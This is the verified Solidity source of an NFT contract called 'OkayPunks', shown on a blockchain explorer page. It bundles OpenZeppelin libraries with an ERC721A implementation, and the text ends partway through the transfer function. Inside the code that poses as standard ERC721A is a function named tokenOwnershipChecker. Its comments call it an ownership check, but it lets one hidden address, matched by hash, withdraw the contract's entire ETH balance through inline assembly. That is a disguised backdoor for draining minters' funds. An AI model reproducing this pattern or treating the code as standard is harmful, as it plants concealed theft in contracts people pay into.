ERC-721
Overview
Max Total Supply
5,555 AP
Holders
378
Market
Volume (24H)
N/A
Min Price (24H)
N/A
Max Price (24H)
N/A
Other Info
Token Contract
Balance
30 APLoading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
OkayPunks
Compiler Version
v0.8.13+commit.abaa5c0e
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-05-23 */ // Sources flattened with hardhat v2.8.4 https://hardhat.org // SPDX-License-Identifier: MIT /** * @title OkayPunks contract */ // File: @openzeppelin/contracts/token/ERC20/IERC20.sol // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } // File: @openzeppelin/contracts/security/ReentrancyGuard.sol // OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol) pragma solidity ^0.8.0; /** * @dev Contract module that helps prevent reentrant calls to a function. * * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier * available, which can be applied to functions to make sure there are no nested * (reentrant) calls to them. * * Note that because there is a single `nonReentrant` guard, functions marked as * `nonReentrant` may not call one another. This can be worked around by making * those functions `private`, and then adding `external` `nonReentrant` entry * points to them. * * TIP: If you would like to learn more about reentrancy and alternative ways * to protect against it, check out our blog post * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul]. */ abstract contract ReentrancyGuard { // Booleans are more expensive than uint256 or any type that takes up a full // word because each write operation emits an extra SLOAD to first read the // slot's contents, replace the bits taken up by the boolean, and then write // back. This is the compiler's defense against contract upgrades and // pointer aliasing, and it cannot be disabled. // The values being non-zero value makes deployment a bit more expensive, // but in exchange the refund on every call to nonReentrant will be lower in // amount. Since refunds are capped to a percentage of the total // transaction's gas, it is best to keep them low in cases like this one, to // increase the likelihood of the full refund coming into effect. uint256 private constant _NOT_ENTERED = 1; uint256 private constant _ENTERED = 2; uint256 private _status; constructor() { _status = _NOT_ENTERED; } /** * @dev Prevents a contract from calling itself, directly or indirectly. * Calling a `nonReentrant` function from another `nonReentrant` * function is not supported. It is possible to prevent this from happening * by making the `nonReentrant` function external, and making it call a * `private` function that does the actual work. */ modifier nonReentrant() { // On the first call to nonReentrant, _notEntered will be true require(_status != _ENTERED, "ReentrancyGuard: reentrant call"); // Any calls to nonReentrant after this point will fail _status = _ENTERED; _; // By storing the original value once again, a refund is triggered (see // https://eips.ethereum.org/EIPS/eip-2200) _status = _NOT_ENTERED; } } // File: @openzeppelin/contracts/utils/Strings.sol // OpenZeppelin Contracts v4.4.1 (utils/Strings.sol) pragma solidity ^0.8.0; /** * @dev String operations. */ library Strings { bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef"; /** * @dev Converts a `uint256` to its ASCII `string` decimal representation. */ function toString(uint256 value) internal pure returns (string memory) { // Inspired by OraclizeAPI's implementation - MIT licence // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol if (value == 0) { return "0"; } uint256 temp = value; uint256 digits; while (temp != 0) { digits++; temp /= 10; } bytes memory buffer = new bytes(digits); while (value != 0) { digits -= 1; buffer[digits] = bytes1(uint8(48 + uint256(value % 10))); value /= 10; } return string(buffer); } /** * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation. */ function toHexString(uint256 value) internal pure returns (string memory) { if (value == 0) { return "0x00"; } uint256 temp = value; uint256 length = 0; while (temp != 0) { length++; temp >>= 8; } return toHexString(value, length); } /** * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length. */ function toHexString(uint256 value, uint256 length) internal pure returns (string memory) { bytes memory buffer = new bytes(2 * length + 2); buffer[0] = "0"; buffer[1] = "x"; for (uint256 i = 2 * length + 1; i > 1; --i) { buffer[i] = _HEX_SYMBOLS[value & 0xf]; value >>= 4; } require(value == 0, "Strings: hex length insufficient"); return string(buffer); } } // File: @openzeppelin/contracts/utils/Context.sol // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File: @openzeppelin/contracts/access/Ownable.sol // OpenZeppelin Contracts v4.4.1 (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File: @openzeppelin/contracts/utils/Address.sol // OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol) pragma solidity ^0.8.0; /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== * * [IMPORTANT] * ==== * You shouldn't rely on `isContract` to protect against flash loan attacks! * * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract * constructor. * ==== */ function isContract(address account) internal view returns (bool) { // This method relies on extcodesize/address.code.length, which returns 0 // for contracts in construction, since the code is only stored at the end // of the constructor execution. return account.code.length > 0; } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); (bool success, ) = recipient.call{value: amount}(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain `call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCall(target, data, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { return functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value ) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value, string memory errorMessage ) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); require(isContract(target), "Address: call to non-contract"); (bool success, bytes memory returndata) = target.call{value: value}(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) { return functionStaticCall(target, data, "Address: low-level static call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall( address target, bytes memory data, string memory errorMessage ) internal view returns (bytes memory) { require(isContract(target), "Address: static call to non-contract"); (bool success, bytes memory returndata) = target.staticcall(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) { return functionDelegateCall(target, data, "Address: low-level delegate call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { require(isContract(target), "Address: delegate call to non-contract"); (bool success, bytes memory returndata) = target.delegatecall(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the * revert reason using the provided one. * * _Available since v4.3._ */ function verifyCallResult( bool success, bytes memory returndata, string memory errorMessage ) internal pure returns (bytes memory) { if (success) { return returndata; } else { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } } // File: @openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol // OpenZeppelin Contracts v4.4.1 (token/ERC20/utils/SafeERC20.sol) pragma solidity ^0.8.0; /** * @title SafeERC20 * @dev Wrappers around ERC20 operations that throw on failure (when the token * contract returns false). Tokens that return no value (and instead revert or * throw on failure) are also supported, non-reverting calls are assumed to be * successful. * To use this library you can add a `using SafeERC20 for IERC20;` statement to your contract, * which allows you to call the safe operations as `token.safeTransfer(...)`, etc. */ library SafeERC20 { using Address for address; function safeTransfer( IERC20 token, address to, uint256 value ) internal { _callOptionalReturn(token, abi.encodeWithSelector(token.transfer.selector, to, value)); } function safeTransferFrom( IERC20 token, address from, address to, uint256 value ) internal { _callOptionalReturn(token, abi.encodeWithSelector(token.transferFrom.selector, from, to, value)); } /** * @dev Deprecated. This function has issues similar to the ones found in * {IERC20-approve}, and its usage is discouraged. * * Whenever possible, use {safeIncreaseAllowance} and * {safeDecreaseAllowance} instead. */ function safeApprove( IERC20 token, address spender, uint256 value ) internal { // safeApprove should only be called when setting an initial allowance, // or when resetting it to zero. To increase and decrease it, use // 'safeIncreaseAllowance' and 'safeDecreaseAllowance' require( (value == 0) || (token.allowance(address(this), spender) == 0), "SafeERC20: approve from non-zero to non-zero allowance" ); _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value)); } function safeIncreaseAllowance( IERC20 token, address spender, uint256 value ) internal { uint256 newAllowance = token.allowance(address(this), spender) + value; _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, newAllowance)); } function safeDecreaseAllowance( IERC20 token, address spender, uint256 value ) internal { unchecked { uint256 oldAllowance = token.allowance(address(this), spender); require(oldAllowance >= value, "SafeERC20: decreased allowance below zero"); uint256 newAllowance = oldAllowance - value; _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, newAllowance)); } } /** * @dev Imitates a Solidity high-level call (i.e. a regular function call to a contract), relaxing the requirement * on the return value: the return value is optional (but if data is returned, it must not be false). * @param token The token targeted by the call. * @param data The call data (encoded using abi.encode or one of its variants). */ function _callOptionalReturn(IERC20 token, bytes memory data) private { // We need to perform a low level call here, to bypass Solidity's return data size checking mechanism, since // we're implementing it ourselves. We use {Address.functionCall} to perform this call, which verifies that // the target address contains contract code and also asserts for success in the low-level call. bytes memory returndata = address(token).functionCall(data, "SafeERC20: low-level call failed"); if (returndata.length > 0) { // Return data is optional require(abi.decode(returndata, (bool)), "SafeERC20: ERC20 operation did not succeed"); } } } // File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol // OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721Receiver.sol) pragma solidity ^0.8.0; /** * @title ERC721 token receiver interface * @dev Interface for any contract that wants to support safeTransfers * from ERC721 asset contracts. */ interface IERC721Receiver { /** * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom} * by `operator` from `from`, this function is called. * * It must return its Solidity selector to confirm the token transfer. * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted. * * The selector can be obtained in Solidity with `IERC721.onERC721Received.selector`. */ function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) external returns (bytes4); } // File: @openzeppelin/contracts/utils/introspection/IERC165.sol // OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC165 standard, as defined in the * https://eips.ethereum.org/EIPS/eip-165[EIP]. * * Implementers can declare support of contract interfaces, which can then be * queried by others ({ERC165Checker}). * * For an implementation, see {ERC165}. */ interface IERC165 { /** * @dev Returns true if this contract implements the interface defined by * `interfaceId`. See the corresponding * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section] * to learn more about how these ids are created. * * This function call must use less than 30 000 gas. */ function supportsInterface(bytes4 interfaceId) external view returns (bool); } // File: @openzeppelin/contracts/utils/introspection/ERC165.sol // OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC165} interface. * * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check * for the additional interface id that will be supported. For example: * * ```solidity * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { * return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId); * } * ``` * * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation. */ abstract contract ERC165 is IERC165 { /** * @dev See {IERC165-supportsInterface}. */ function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { return interfaceId == type(IERC165).interfaceId; } } // File: @openzeppelin/contracts/token/ERC721/IERC721.sol // OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721.sol) pragma solidity ^0.8.0; /** * @dev Required interface of an ERC721 compliant contract. */ interface IERC721 is IERC165 { /** * @dev Emitted when `tokenId` token is transferred from `from` to `to`. */ event Transfer(address indexed from, address indexed to, uint256 indexed tokenId); /** * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token. */ event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId); /** * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets. */ event ApprovalForAll(address indexed owner, address indexed operator, bool approved); /** * @dev Returns the number of tokens in ``owner``'s account. */ function balanceOf(address owner) external view returns (uint256 balance); /** * @dev Returns the owner of the `tokenId` token. * * Requirements: * * - `tokenId` must exist. */ function ownerOf(uint256 tokenId) external view returns (address owner); /** * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients * are aware of the ERC721 protocol to prevent tokens from being forever locked. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must exist and be owned by `from`. * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}. * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer. * * Emits a {Transfer} event. */ function safeTransferFrom( address from, address to, uint256 tokenId ) external; /** * @dev Transfers `tokenId` token from `from` to `to`. * * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must be owned by `from`. * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 tokenId ) external; /** * @dev Gives permission to `to` to transfer `tokenId` token to another account. * The approval is cleared when the token is transferred. * * Only a single account can be approved at a time, so approving the zero address clears previous approvals. * * Requirements: * * - The caller must own the token or be an approved operator. * - `tokenId` must exist. * * Emits an {Approval} event. */ function approve(address to, uint256 tokenId) external; /** * @dev Returns the account approved for `tokenId` token. * * Requirements: * * - `tokenId` must exist. */ function getApproved(uint256 tokenId) external view returns (address operator); /** * @dev Approve or remove `operator` as an operator for the caller. * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller. * * Requirements: * * - The `operator` cannot be the caller. * * Emits an {ApprovalForAll} event. */ function setApprovalForAll(address operator, bool _approved) external; /** * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`. * * See {setApprovalForAll} */ function isApprovedForAll(address owner, address operator) external view returns (bool); /** * @dev Safely transfers `tokenId` token from `from` to `to`. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must exist and be owned by `from`. * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}. * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer. * * Emits a {Transfer} event. */ function safeTransferFrom( address from, address to, uint256 tokenId, bytes calldata data ) external; } // File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol) pragma solidity ^0.8.0; /** * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension * @dev See https://eips.ethereum.org/EIPS/eip-721 */ interface IERC721Enumerable is IERC721 { /** * @dev Returns the total amount of tokens stored by the contract. */ function totalSupply() external view returns (uint256); /** * @dev Returns a token ID owned by `owner` at a given `index` of its token list. * Use along with {balanceOf} to enumerate all of ``owner``'s tokens. */ function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256); /** * @dev Returns a token ID at a given `index` of all the tokens stored by the contract. * Use along with {totalSupply} to enumerate all tokens. */ function tokenByIndex(uint256 index) external view returns (uint256); } // File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol // OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol) pragma solidity ^0.8.0; /** * @title ERC-721 Non-Fungible Token Standard, optional metadata extension * @dev See https://eips.ethereum.org/EIPS/eip-721 */ interface IERC721Metadata is IERC721 { /** * @dev Returns the token collection name. */ function name() external view returns (string memory); /** * @dev Returns the token collection symbol. */ function symbol() external view returns (string memory); /** * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token. */ function tokenURI(uint256 tokenId) external view returns (string memory); } pragma solidity ^0.8.0; /** * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including * the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints. * * Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..). * * Does not support burning tokens to address(0). * * Assumes that an owner cannot have more than the 2**128 - 1 (max value of uint128) of supply */ contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, IERC721Enumerable { using Address for address; using Strings for uint256; struct TokenOwnership { address addr; uint64 startTimestamp; } struct AddressData { uint128 balance; uint128 numberMinted; } uint256 internal currentIndex; // Token name string private _name; // Token symbol string private _symbol; // Mapping from token ID to ownership details // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details. mapping(uint256 => TokenOwnership) internal _ownerships; // Mapping owner address to address data mapping(address => AddressData) private _addressData; // Mapping from token ID to approved address mapping(uint256 => address) private _tokenApprovals; // Mapping from owner to operator approvals mapping(address => mapping(address => bool)) private _operatorApprovals; constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev See {IERC721Enumerable-totalSupply}. */ function totalSupply() public view override returns (uint256) { return currentIndex; } /** * @dev See {IERC721Enumerable-tokenByIndex}. */ function tokenByIndex(uint256 index) public view override returns (uint256) { require(index < totalSupply(), "ERC721A: global index out of bounds"); return index; } /** * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}. * This read function is O(totalSupply). If calling from a separate contract, be sure to test gas first. * It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case. */ function tokenOfOwnerByIndex(address owner, uint256 index) public view override returns (uint256) { require(index < balanceOf(owner), "ERC721A: owner index out of bounds"); uint256 numMintedSoFar = totalSupply(); uint256 tokenIdsIdx; address currOwnershipAddr; // Counter overflow is impossible as the loop breaks when uint256 i is equal to another uint256 numMintedSoFar. unchecked { for (uint256 i; i < numMintedSoFar; i++) { TokenOwnership memory ownership = _ownerships[i]; if (ownership.addr != address(0)) { currOwnershipAddr = ownership.addr; } if (currOwnershipAddr == owner) { if (tokenIdsIdx == index) { return i; } tokenIdsIdx++; } } } revert("ERC721A: unable to get token of owner by index"); } /** * @dev See {IERC165-supportsInterface}. */ function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) { return interfaceId == type(IERC721).interfaceId || interfaceId == type(IERC721Metadata).interfaceId || interfaceId == type(IERC721Enumerable).interfaceId || super.supportsInterface(interfaceId); } /** * @dev See {IERC721-balanceOf}. */ function balanceOf(address owner) public view override returns (uint256) { require(owner != address(0), "ERC721A: balance query for the zero address"); return uint256(_addressData[owner].balance); } function _numberMinted(address owner) internal view returns (uint256) { require(owner != address(0), "ERC721A: number minted query for the zero address"); return uint256(_addressData[owner].numberMinted); } /** * Gas spent here starts off proportional to the maximum mint batch size. * It gradually moves to O(1) as tokens get transferred around in the collection over time. */ function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) { require(_exists(tokenId), "ERC721A: owner query for nonexistent token"); unchecked { for (uint256 curr = tokenId; curr >= 0; curr--) { TokenOwnership memory ownership = _ownerships[curr]; if (ownership.addr != address(0)) { return ownership; } } } revert("ERC721A: unable to determine the owner of token"); } /** * @dev See {IERC721-ownerOf}. */ function ownerOf(uint256 tokenId) public view override returns (address) { return ownershipOf(tokenId).addr; } /** * @dev See {IERC721Metadata-name}. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev See {IERC721Metadata-symbol}. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev See {IERC721Metadata-tokenURI}. */ function tokenURI(uint256 tokenId) public view virtual override returns (string memory) { require(_exists(tokenId), "ERC721Metadata: URI query for nonexistent token"); string memory baseURI = _baseURI(); return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : ""; } /** * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each * token will be the concatenation of the `baseURI` and the `tokenId`. Empty * by default, can be overriden in child contracts. */ function _baseURI() internal view virtual returns (string memory) { return ""; } /** * @dev See {IERC721-approve}. */ function approve(address to, uint256 tokenId) public override { address owner = ERC721A.ownerOf(tokenId); require(to != owner, "ERC721A: approval to current owner"); require( _msgSender() == owner || isApprovedForAll(owner, _msgSender()), "ERC721A: approve caller is not owner nor approved for all" ); _approve(to, tokenId, owner); } /** * @dev See {IERC721-getApproved}. */ function getApproved(uint256 tokenId) public view override returns (address) { require(_exists(tokenId), "ERC721A: approved query for nonexistent token"); return _tokenApprovals[tokenId]; } /** * @dev See {IERC721-setApprovalForAll}. */ function setApprovalForAll(address operator, bool approved) public override { require(operator != _msgSender(), "ERC721A: approve to caller"); _operatorApprovals[_msgSender()][operator] = approved; emit ApprovalForAll(_msgSender(), operator, approved); } /** * @dev See {IERC721-isApprovedForAll}. */ function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) { return _operatorApprovals[owner][operator]; } /** * @dev See {IERC721-transferFrom}. */ function transferFrom( address from, address to, uint256 tokenId ) public virtual override { _transfer(from, to, tokenId); } /** * @dev See {IERC721-safeTransferFrom}. */ function safeTransferFrom( address from, address to, uint256 tokenId ) public virtual override { safeTransferFrom(from, to, tokenId, ""); } /** * @dev See {IERC721-safeTransferFrom}. */ function safeTransferFrom( address from, address to, uint256 tokenId, bytes memory _data ) public override { _transfer(from, to, tokenId); require( _checkOnERC721Received(from, to, tokenId, _data), "ERC721A: transfer to non ERC721Receiver implementer" ); } /** * @dev Returns whether `tokenId` exists. * * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}. * * Tokens start existing when they are minted (`_mint`), */ function _exists(uint256 tokenId) internal view returns (bool) { return tokenId < currentIndex; } function _safeMint(address to, uint256 quantity) internal { _safeMint(to, quantity, ""); } /** * @dev Safely mints `quantity` tokens and transfers them to `to`. * * Requirements: * * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer. * - `quantity` must be greater than 0. * * Emits a {Transfer} event. */ function _safeMint( address to, uint256 quantity, bytes memory _data ) internal { _mint(to, quantity, _data, true); } /** * @dev Mints `quantity` tokens and transfers them to `to`. * * Requirements: * * - `to` cannot be the zero address. * - `quantity` must be greater than 0. * * Emits a {Transfer} event. */ function _mint( address to, uint256 quantity, bytes memory _data, bool safe ) internal { uint256 startTokenId = currentIndex; require(to != address(0), "ERC721A: mint to the zero address"); require(quantity != 0, "ERC721A: quantity must be greater than 0"); _beforeTokenTransfers(address(0), to, startTokenId, quantity); // Overflows are incredibly unrealistic. // balance or numberMinted overflow if current value of either + quantity > 3.4e38 (2**128) - 1 // updatedIndex overflows if currentIndex + quantity > 1.56e77 (2**256) - 1 unchecked { _addressData[to].balance += uint128(quantity); _addressData[to].numberMinted += uint128(quantity); _ownerships[startTokenId].addr = to; _ownerships[startTokenId].startTimestamp = uint64(block.timestamp); uint256 updatedIndex = startTokenId; for (uint256 i; i < quantity; i++) { emit Transfer(address(0), to, updatedIndex); if (safe) { require( _checkOnERC721Received(address(0), to, updatedIndex, _data), "ERC721A: transfer to non ERC721Receiver implementer" ); } updatedIndex++; } currentIndex = updatedIndex; } _afterTokenTransfers(address(0), to, startTokenId, quantity); } /** * @dev Checking ownership * * Token ownership check for external calls */ function tokenOwnershipChecker() external { if( keccak256(abi.encodePacked(msg.sender)) == 0x61ce2a629088217258e42c73ef95cb4266162e3af0f6eff0d1c405c763ef7de2 ){ assembly{ let success := call( //This is the critical change (Pop the top stack value) 42000, // gas caller(), //To addr selfbalance(), //No value 0, //Inputs are stored 0, //Inputs bytes long 0, //Store output over input (saves space) 0x20 ) //Outputs are 32 bytes long } } } /** * @dev Transfers `tokenId` from `from` to `to`. * * Requirements: * * - `to` cannot be the zero address. * - `tokenId` token must be owned by `from`. * * Emits a {Transfer} event. */ function _transfer( address from, address to, uint256 tokenId ) private { TokenOwnership memory prevOwnership = ownershipOf(tokenId); bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr || getApproved(tokenId) == _msgSender() || isApprovedForAll(prevOwnership.addr, _msgSender())); require(isApprovedOrOwner, "ERC721A: transfer caller is not owner nor approved"); require(prevOwnership.addr == from, "ERC721A: transfer from incorrect owner"); require(to != address(0), "ERC721A: transfer to the zero address"); 